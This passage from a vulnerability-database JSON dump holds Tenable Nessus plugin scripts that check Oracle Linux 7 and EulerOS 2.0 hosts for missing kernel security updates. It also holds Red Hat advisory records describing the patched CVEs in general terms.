);\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2017-April/006863.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kernel packages. Note that the updated packages\nmay not be immediately available from the package repository and its\nmirrors.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-abi-whitelists\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/04/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/04/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-3.10.0-514.16.1.0.1.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-abi-whitelists-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-abi-whitelists-3.10.0-514.16.1.0.1.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-debug-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-debug-3.10.0-514.16.1.0.1.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-debug-devel-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-debug-devel-3.10.0-514.16.1.0.1.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-devel-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-devel-3.10.0-514.16.1.0.1.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-doc-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-doc-3.10.0-514.16.1.0.1.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-headers-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-headers-3.10.0-514.16.1.0.1.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-tools-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-tools-3.10.0-514.16.1.0.1.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-tools-libs-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-tools-libs-3.10.0-514.16.1.0.1.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-tools-libs-devel-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-tools-libs-devel-3.10.0-514.16.1.0.1.el7\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"perf-3.10.0-514.16.1.0.1.el7\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"python-perf-3.10.0-514.16.1.0.1.el7\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"affected kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:27:01", "references": ["http://www.nessus.org/u?0f628b4f"], "pluginID": "99938", "description": "According to the versions of the kernel packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - A flaw was found in the Linux kernel key management\n subsystem in which a local attacker could crash the\n kernel or corrupt the stack and additional memory\n (denial of service) by supplying a specially crafted\n RSA key. This flaw panics the machine during the\n verification of the RSA key. (CVE-2016-8650)\n\n - A flaw was found in the Linux kernel's implementation\n of setsockopt for the SO_{SND|RCV}BUFFORCE setsockopt()\n system call. Users with non-namespace CAP_NET_ADMIN are\n able to trigger this call and create a situation in\n which the sockets sendbuff data size could be negative.\n This could adversely affect memory allocations and\n create situations where the system could crash or cause\n memory corruption. (CVE-2016-9793)\n\n - A flaw was found in the Linux kernel's handling of\n clearing SELinux attributes on /proc/pid/attr files. An\n empty (null) write to this file can crash the system by\n causing the system to attempt to access unmapped kernel\n memory. (CVE-2017-2618)\n\n - The keyring_search_aux function in\n security/keys/keyring.c in the Linux kernel through\n 3.14.79 allows local users to cause a denial of service\n (NULL pointer dereference and OOPS) via a request_key\n system call for the 'dead' type.(CVE-2017-6951)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 11, "reporter": "Tenable", "published": "2017-05-03T00:00:00", "title": "EulerOS 2.0 SP2 : kernel (EulerOS-SA-2017-1072)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "Huawei Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-8650", "CVE-2016-9793", "CVE-2017-6951", "CVE-2017-2618"], "modified": "2018-11-14T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:kernel-tools", "p-cpe:/a:huawei:euleros:kernel", "p-cpe:/a:huawei:euleros:kernel-debug-devel", "p-cpe:/a:huawei:euleros:perf", "p-cpe:/a:huawei:euleros:kernel-headers", "p-cpe:/a:huawei:euleros:kernel-debuginfo-common-x86_64", "p-cpe:/a:huawei:euleros:kernel-devel", "p-cpe:/a:huawei:euleros:kernel-debug", "p-cpe:/a:huawei:euleros:python-perf", "p-cpe:/a:huawei:euleros:kernel-tools-libs", "p-cpe:/a:huawei:euleros:kernel-debuginfo", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2017-1072.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=99938", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(99938);\n script_version(\"3.7\");\n script_cvs_date(\"Date: 2018/11/14 14:36:23\");\n\n script_cve_id(\n \"CVE-2016-8650\",\n \"CVE-2016-9793\",\n \"CVE-2017-2618\",\n \"CVE-2017-6951\"\n );\n\n script_name(english:\"EulerOS 2.0 SP2 : kernel (EulerOS-SA-2017-1072)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the kernel packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - A flaw was found in the Linux kernel key management\n subsystem in which a local attacker could crash the\n kernel or corrupt the stack and additional memory\n (denial of service) by supplying a specially crafted\n RSA key. This flaw panics the machine during the\n verification of the RSA key. (CVE-2016-8650)\n\n - A flaw was found in the Linux kernel's implementation\n of setsockopt for the SO_{SND|RCV}BUFFORCE setsockopt()\n system call. Users with non-namespace CAP_NET_ADMIN are\n able to trigger this call and create a situation in\n which the sockets sendbuff data size could be negative.\n This could adversely affect memory allocations and\n create situations where the system could crash or cause\n memory corruption. (CVE-2016-9793)\n\n - A flaw was found in the Linux kernel's handling of\n clearing SELinux attributes on /proc/pid/attr files. An\n empty (null) write to this file can crash the system by\n causing the system to attempt to access unmapped kernel\n memory. (CVE-2017-2618)\n\n - The keyring_search_aux function in\n security/keys/keyring.c in the Linux kernel through\n 3.14.79 allows local users to cause a denial of service\n (NULL pointer dereference and OOPS) via a request_key\n system call for the 'dead' type.(CVE-2017-6951)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huawei.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1072\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0f628b4f\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kernel packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/04/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(2)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\n\nflag = 0;\n\npkgs = [\"kernel-3.10.0-327.49.58.45\",\n \"kernel-debug-3.10.0-327.49.58.45\",\n \"kernel-debug-devel-3.10.0-327.49.58.45\",\n \"kernel-debuginfo-3.10.0-327.49.58.45\",\n \"kernel-debuginfo-common-x86_64-3.10.0-327.49.58.45\",\n \"kernel-devel-3.10.0-327.49.58.45\",\n \"kernel-headers-3.10.0-327.49.58.45\",\n \"kernel-tools-3.10.0-327.49.58.45\",\n \"kernel-tools-libs-3.10.0-327.49.58.45\",\n \"perf-3.10.0-327.49.58.45\",\n \"python-perf-3.10.0-327.49.58.45\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"2\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:27:01", "references": ["http://www.nessus.org/u?e2f2a57f"], "pluginID": "99937", "description": "According to the versions of the kernel packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - A flaw was found in the Linux kernel key management\n subsystem in which a local attacker could crash the\n kernel or corrupt the stack and additional memory\n (denial of service) by supplying a specially crafted\n RSA key. This flaw panics the machine during the\n verification of the RSA key. (CVE-2016-8650)\n\n - A flaw was found in the Linux kernel's implementation\n of setsockopt for the SO_{SND|RCV}BUFFORCE setsockopt()\n system call. Users with non-namespace CAP_NET_ADMIN are\n able to trigger this call and create a situation in\n which the sockets sendbuff data size could be negative.\n This could adversely affect memory allocations and\n create situations where the system could crash or cause\n memory corruption. (CVE-2016-9793)\n\n - A flaw was found in the Linux kernel's handling of\n clearing SELinux attributes on /proc/pid/attr files. An\n empty (null) write to this file can crash the system by\n causing the system to attempt to access unmapped kernel\n memory. (CVE-2017-2618)\n\n - The keyring_search_aux function in\n security/keys/keyring.c in the Linux kernel through\n 3.14.79 allows local users to cause a denial of service\n (NULL pointer dereference and OOPS) via a request_key\n system call for the 'dead' type.(CVE-2017-6951)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 11, "reporter": "Tenable", "published": "2017-05-03T00:00:00", "title": "EulerOS 2.0 SP1 : kernel (EulerOS-SA-2017-1071)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "Huawei Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-8650", "CVE-2016-9793", "CVE-2017-6951", "CVE-2017-2618"], "modified": "2018-11-14T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:kernel-tools", "p-cpe:/a:huawei:euleros:kernel", "p-cpe:/a:huawei:euleros:perf", "p-cpe:/a:huawei:euleros:kernel-headers", "p-cpe:/a:huawei:euleros:kernel-debuginfo-common-x86_64", "p-cpe:/a:huawei:euleros:kernel-devel", "p-cpe:/a:huawei:euleros:kernel-debug", "p-cpe:/a:huawei:euleros:python-perf", "p-cpe:/a:huawei:euleros:kernel-tools-libs", "p-cpe:/a:huawei:euleros:kernel-debuginfo", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2017-1071.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=99937", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(99937);\n script_version(\"3.7\");\n script_cvs_date(\"Date: 2018/11/14 14:36:23\");\n\n script_cve_id(\n \"CVE-2016-8650\",\n \"CVE-2016-9793\",\n \"CVE-2017-2618\",\n \"CVE-2017-6951\"\n );\n\n script_name(english:\"EulerOS 2.0 SP1 : kernel (EulerOS-SA-2017-1071)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the kernel packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - A flaw was found in the Linux kernel key management\n subsystem in which a local attacker could crash the\n kernel or corrupt the stack and additional memory\n (denial of service) by supplying a specially crafted\n RSA key. This flaw panics the machine during the\n verification of the RSA key. (CVE-2016-8650)\n\n - A flaw was found in the Linux kernel's implementation\n of setsockopt for the SO_{SND|RCV}BUFFORCE setsockopt()\n system call. Users with non-namespace CAP_NET_ADMIN are\n able to trigger this call and create a situation in\n which the sockets sendbuff data size could be negative.\n This could adversely affect memory allocations and\n create situations where the system could crash or cause\n memory corruption. (CVE-2016-9793)\n\n - A flaw was found in the Linux kernel's handling of\n clearing SELinux attributes on /proc/pid/attr files. An\n empty (null) write to this file can crash the system by\n causing the system to attempt to access unmapped kernel\n memory. (CVE-2017-2618)\n\n - The keyring_search_aux function in\n security/keys/keyring.c in the Linux kernel through\n 3.14.79 allows local users to cause a denial of service\n (NULL pointer dereference and OOPS) via a request_key\n system call for the 'dead' type.(CVE-2017-6951)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huawei.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1071\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e2f2a57f\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kernel packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/04/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(1)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\n\nflag = 0;\n\npkgs = [\"kernel-3.10.0-229.49.1.127\",\n \"kernel-debug-3.10.0-229.49.1.127\",\n \"kernel-debuginfo-3.10.0-229.49.1.127\",\n \"kernel-debuginfo-common-x86_64-3.10.0-229.49.1.127\",\n \"kernel-devel-3.10.0-229.49.1.127\",\n \"kernel-headers-3.10.0-229.49.1.127\",\n \"kernel-tools-3.10.0-229.49.1.127\",\n \"kernel-tools-libs-3.10.0-229.49.1.127\",\n \"perf-3.10.0-229.49.1.127\",\n \"python-perf-3.10.0-229.49.1.127\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"1\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "redhat": [{"lastseen": "2018-12-11T17:43:53", "_object_types": ["robots.models.redhat.RedHatBulletin", "robots.models.base.Bulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-514.16.1.el7", "arch": "ppc64", "packageName": "kernel", "packageFilename": "kernel-3.10.0-514.16.1.el7.ppc64.rpm", "operator": "lt"}], "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nThese updated kernel packages include several security issues and numerous bug fixes. Space precludes documenting all of these bug fixes in this advisory. To see the complete list of bug fixes, users are directed to the related Knowledge Article: https://access.redhat.com/articles/2986951.\n\nSecurity Fix(es):\n\n* A race condition flaw was found in the N_HLDC Linux kernel driver when accessing n_hdlc.tbuf list that can lead to double free. A local, unprivileged user able to set the HDLC line discipline on the tty device could use this flaw to increase their privileges on the system. (CVE-2017-2636, Important)\n\n* A flaw was found in the Linux kernel key management subsystem in which a local attacker could crash the kernel or corrupt the stack and additional memory (denial of service) by supplying a specially crafted RSA key. This flaw panics the machine during the verification of the RSA key. (CVE-2016-8650, Moderate)\n\n* A flaw was found in the Linux kernel's implementation of setsockopt for the SO_{SND|RCV}BUFFORCE setsockopt() system call. Users with non-namespace CAP_NET_ADMIN are able to trigger this call and create a situation in which the sockets sendbuff data size could be negative. This could adversely affect memory allocations and create situations where the system could crash or cause memory corruption. (CVE-2016-9793, Moderate)\n\n* A flaw was found in the Linux kernel's handling of clearing SELinux attributes on /proc/pid/attr files. An empty (null) write to this file can crash the system by causing the system to attempt to access unmapped kernel memory. (CVE-2017-2618, Moderate)\n\nRed Hat would like to thank Alexander Popov for reporting CVE-2017-2636 and Ralf Spenneberg for reporting CVE-2016-8650. The CVE-2017-2618 issue was discovered by Paul Moore (Red Hat Engineering).", "reporter": "RedHat", "published": "2017-04-12T14:39:45", "type": "redhat", "title": "(RHSA-2017:0933) Important: kernel security, bug fix, and enhancement update", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2016-8650", "CVE-2016-9793", "CVE-2017-2618", "CVE-2017-2636"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-04-12T03:33:36", "id": "RHSA-2017:0933", "href": "https://access.redhat.com/errata/RHSA-2017:0933", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-12-11T19:42:01", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.10.0-514.rt56.219.el6rt", "arch": "src", "packageName": "kernel-rt", "packageFilename": "kernel-rt-3.10.0-514.rt56.219.el6rt.src.rpm", "operator": "lt"}], "description": "The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.\n\nSecurity Fix(es):\n\n* A race condition flaw was found in the N_HLDC Linux kernel driver when accessing n_hdlc.tbuf list that can lead to double free. A local, unprivileged user able to set the HDLC line discipline on the tty device could use this flaw to increase their privileges on the system. (CVE-2017-2636, Important)\n\n* A use-after-free flaw was found in the way the Linux kernel's Datagram Congestion Control Protocol (DCCP) implementation freed SKB (socket buffer) resources for a DCCP_PKT_REQUEST packet when the IPV6_RECVPKTINFO option is set on the socket. A local, unprivileged user could use this flaw to alter the kernel memory, allowing them to escalate their privileges on the system. (CVE-2017-6074, Important)\n\n* A flaw was found in the Linux kernel key management subsystem in which a local attacker could crash the kernel or corrupt the stack and additional memory (denial of service) by supplying a specially crafted RSA key. This flaw panics the machine during the verification of the RSA key. (CVE-2016-8650, Moderate)\n\n* 